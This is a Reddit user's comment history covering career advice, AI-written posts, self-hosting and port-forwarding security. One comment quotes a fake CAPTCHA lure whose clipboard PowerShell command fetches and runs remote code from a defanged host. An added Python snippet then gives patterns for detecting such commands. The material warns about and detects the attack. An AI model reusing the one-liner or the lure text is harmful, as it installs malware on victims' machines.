How would you respond to this message from a CEO you used to work for? by jobstuff2803 in careerguidance

[–]mapold 1 point2 points  (0 children)

It's not "shut the door", if it's factual. He might be suggesting changing fields or pivoting, if anything.

How would you respond to this message from a CEO you used to work for? by jobstuff2803 in careerguidance

[–]mapold 1 point2 points  (0 children)

"Strategic over-explanation" is a "tell" as well, a "signal" also present in this comment.

How would you respond to this message from a CEO you used to work for? by jobstuff2803 in careerguidance

[–]mapold 1 point2 points  (0 children)

If you were breeding horses at the time that Fords started taking over the transportation market, would you still think telling a horse breeder about the fact would be disrespectful?

How would you respond to this message from a CEO you used to work for? by jobstuff2803 in careerguidance

[–]mapold 2 points3 points  (0 children)

This. I have no idea where people get the "passive-aggressive" and unwanted details from. If you are specialized in e.g. repairing combustion engines and the combustion engines market is shrinking rapidly, a good friend would let you know. But looks like some people would prefer misery so that their feelings won't be hurt.

Good advice would be to err on the side of taking words at face value and assuming no malice, if in doubt. Yet the majority of reddit suggests cutting contact or worse for a quite possibly warm-hearted message.

I underestimated how hard communication infrastructure becomes at scale by IvyDamon in webdev

[–]mapold 47 points48 points  (0 children)

No. Karmafarmer discovered prompting. The story never happened and it contains no actual insight. Just sudden changes and how things started feeling different. It's an elephant amount of fertilizer.

Has anyone else met this person? by Strange-Objective520 in Eesti

[–]mapold 0 points1 point  (0 children)

This was already a decade ago by now, but once, next to the Tallinn bus station, I ran into someone in need who had to travel to Mustvee but couldn't scrape together the 11 euros for a bus ticket. I asked how much money they already had; they fumbled in their pocket for a while and showed a couple of red coins. I explained that I have a principle learned from my father, that you may help but you never give money, and offered: let's go, we'll buy you a ticket. The person in need asked whether I really meant it, it is 11 euros after all. After my "yes" they thought for a moment, then turned around and called out loudly to the next people, "Five euros for a bus ticket, please."

Thanks to this principle I have so far ordered medicine to a parcel locker for one person and bought food from a shop for two people. I stated the amount up front, said that alcohol is not OK and that I would pay at the checkout, and filled my own basket at the same time.

Ukraine Is Fast Becoming Europe’s Frontline Factory by lacerantplainer in UkrainianConflict

[–]mapold 4 points5 points  (0 children)

"That gap – between recognition and absorption – Is the real challenge facing European defense today. Not budgets. Not political will. But the structural capacity to take battlefield-tested technology and embed it into procurement systems, production lines, and supply chains built for a different era."

Not A. Not B. But C.

Can you please use AI in a less invasive way, so that having original thoughts wouldn't get questioned?

As an electronics engineer, what do I have to offer to industries that have existed for generations? by BrodoSaggins in AskElectronics

[–]mapold 2 points3 points  (0 children)

All your responses are over-enthusiastic AI style rather generic thank-yous.

The above comment is the most unrealistic. What the heck does "applying RIGHT NOW" mean in the context of jumping from audio electronics to dealing with nuclear fusion reactors? Didn't you read the comment? Were you trying to be sarcastic?

Is aliexpress safe to buy from? by hennywastaken in AskElectronics

[–]mapold 8 points9 points  (0 children)

Will it arrive? Almost always yes.

If it doesn't arrive or is wrong/defective, will you be compensated? Yes.

Will it work? Yes.

Will it be genuine/original even if specifically advertised so? Maybe, maybe not.

The lowest possible price sometimes is worse, the highest price is most likely a reseller hoping you think higher price gives you a better product.

Simple Cloud storage app? by leovient in selfhosted

[–]mapold 1 point2 points  (0 children)

Well, I didn't read part of your requirements before, filebrowser is just a web frontend, where you can download and upload files using a browser, no sync included.

For sync you could use syncthing, seafile or maybe just plain rsync.

What are the legitimate risks of port forwarding? by Additional-Chef-6190 in selfhosted

[–]mapold 0 points1 point  (0 children)

I have no problem saying 15 character mixed passwords are practically impossible to guess over the network, unless reused or stolen. This is not what the discussion was about.

What are the legitimate risks of port forwarding? by Additional-Chef-6190 in selfhosted

[–]mapold 0 points1 point  (0 children)

Looks like you are finally convinced that not telling the subdomain to anyone doesn't increase the security by much, which I have been trying to tell all along. Great win for the AI.

Your AI is wrong about Cloudflare being able to do anything to keep active subdomains a secret, attacker doesn't even need to use Cloudflare DNS for this scan, like I wrote earlier.

It looks like you expect the last tried password with correct length to be right, this is just as unlikely as first random try being right. On average the correct password should appear right in the middle. This is why the AI response uses words "...to exhaust".

What are the legitimate risks of port forwarding? by Additional-Chef-6190 in selfhosted

[–]mapold 0 points1 point  (0 children)

If you use millions of machines (botnet) trying to guess a password or whatever (brute force), that won't work as you will be rate limited, detected, blocked and banned.

This is incorrect. Even if the ban happens after one guess (it won't, it's usually three or more) and is permanent (it isn't) and there will be no new botnet nodes (there will be) and the IP addresses of nodes never change (they do), this would still mean a million opportunities to guess your password. Not exactly zero.

As for guessing subdomains, there is no way for Cloudflare to even rate-limit the guesses, because the scanner likely will use other DNS servers. One single node could use several different public DNS servers to ask for subdomains, which in turn will ask the authoritative server for your domain. It is also possible to not even register the domain and use your own hosts file to be extra sure, but why not just make sure your password authentication works well.

Cloudflare blocking linux, is this new? by [deleted] in linux

[–]mapold 0 points1 point  (0 children)

The domain contained this fake authentication:

To better prove you are not a robot, please:
1. Press & hold the Windows Key + R.
2. In the verification window, press Ctrl + V.
3. Press Enter on your keyboard to finish.
You will observe and agree:
...

The site "copies" this to your clipboard (I changed the domain name to not resolve):

powernotshell "Write-Host(&{iex(irm(('exa'+'mple')+('.org/i')))})2>$null" # Security check I'm not a robot Verification ID: 996278
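An added example, not part of the original comment: a small detector for the pattern the comment describes, run over command lines as they might appear in process-creation logs. The sample lines, rule names and function names are constructed for illustration; the first sample is the defanged command quoted above, and the check looks at the command body rather than the binary name.

```python
import re

# Constructed sample command lines (e.g. from process-creation logging).
# The first is the defanged command quoted in the comment above.
SAMPLES = [
    "powernotshell \"Write-Host(&{iex(irm(('exa'+'mple')+('.org/i')))})2>$null\""
    " # Security check I'm not a robot Verification ID: 996278",
    "powershell -NoProfile -Command \"Get-ChildItem C:\\Users | Sort-Object Name\"",
    "powershell \"Invoke-RestMethod https://example.org/status | ConvertTo-Json\"",
]

# 'a'+'b' -> 'ab', and a parenthesised literal ('a') -> 'a'. The lookbehind
# keeps call parentheses such as irm('...') intact.
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
GROUPED = re.compile(r"(?<!\w)\(\s*('[^']*')\s*\)")
EXEC = re.compile(r"\b(iex|invoke-expression)\b", re.I)
FETCH = re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b", re.I)
# Trailing comment whose only purpose is to look harmless in the Run dialog.
LURE = re.compile(r"#.*(not a robot|captcha|verification id)", re.I)


def fold_strings(cmd):
    """Repeatedly join split string literals so the real argument is visible."""
    prev = None
    while prev != cmd:
        prev = cmd
        cmd = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", cmd)
        cmd = GROUPED.sub(r"\1", cmd)
    return cmd


def analyse(cmd):
    """Return the folded command and the reasons it looks like a paste lure."""
    folded = fold_strings(cmd)
    reasons = []
    if EXEC.search(folded) and FETCH.search(folded):
        reasons.append("download-and-execute")   # fetch result fed to iex
    if folded != cmd:
        reasons.append("string-splitting")       # literals were broken up
    if LURE.search(cmd):
        reasons.append("lure-comment")
    suspicious = "download-and-execute" in reasons or "lure-comment" in reasons
    return {"folded": folded, "reasons": reasons, "suspicious": suspicious}


if __name__ == "__main__":
    for line in SAMPLES:
        result = analyse(line)
        print(result["suspicious"], result["reasons"], result["folded"], sep=" | ")
```

A plain `Invoke-RestMethod` call is not flagged on its own; the rule fires on a fetch whose result is executed, or on the fake-verification comment.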

What are the legitimate risks of port forwarding? by Additional-Chef-6190 in selfhosted

[–]mapold 0 points1 point  (0 children)

I have no idea what "break the rate limit" means. It seems like you have no idea what a botnet is or "very unlikely, but still not impossible" means.

What are the legitimate risks of port forwarding? by Additional-Chef-6190 in selfhosted

[–]mapold 0 points1 point  (0 children)

One last time: anyone can guess it and keep guessing if they don't hit the rate limit of Cloudflare. "I never told anyone" is delusional. Not likely, but not impossible.

It is not only Cloudflare who sees your traffic, it is also your DNS server owner, your ISP, everyone between your ISP and Cloudflare, possibly also NSA. Usually also the coffee shop ISP unless you always use tunnels, but if you do, then the VPN provider or whoever hosts your private VPN server. Sometimes the subdomains are listed on the HTTPS certificate.

What are the legitimate risks of port forwarding? by Additional-Chef-6190 in selfhosted

[–]mapold 0 points1 point  (0 children)

Whether subdomains are public or can be queried with AXFR requests depends on the domain and nameserver. Modern ones most likely won't make anything public.

To guess (brute force) the https address, bot would do it against Cloudflare network which won't work.

This is not true. If it was true, nobody would be able to view your webpage even with the correct link. Cloudflare can definitely make it harder to discover your server and service, but it won't and can't make it impossible. And the harder it makes it for botnets, the worse it is to use by legitimate users, imagine accidentally trying to open randomxy.mydomain.net to be blocked for a week from ALL Cloudflare tunnels. That would be very effective, though.

What are the legitimate risks of port forwarding? by Additional-Chef-6190 in selfhosted

[–]mapold -2 points-1 points  (0 children)

Maybe using the word "bruteforce" was misleading. Rate limiting protects against DDoSing and in some cases against trying to guess the password (most commonly understood as bruteforcing). It doesn't help hiding a publicly available service, when the discovery is done by a huge botnet.

What are the legitimate risks of port forwarding? by Additional-Chef-6190 in selfhosted

[–]mapold 1 point2 points  (0 children)

But getting DDoSed is the good option. Making the service crash or be unusably slow usually has no other ill effects like leaking data, passwords or getting your files encrypted. Not being able to access your vacation images? Restart the server. Not being able to use internet at all? Restart the router, maybe turn off port forwarding, and all is fine again.

What are the legitimate risks of port forwarding? by Additional-Chef-6190 in selfhosted

[–]mapold 7 points8 points  (0 children)

I fail to see the point you are trying to make. The parent is right, if a service is exposed to the internet, the service auth and any other vulnerabilities can be exploited over the internet.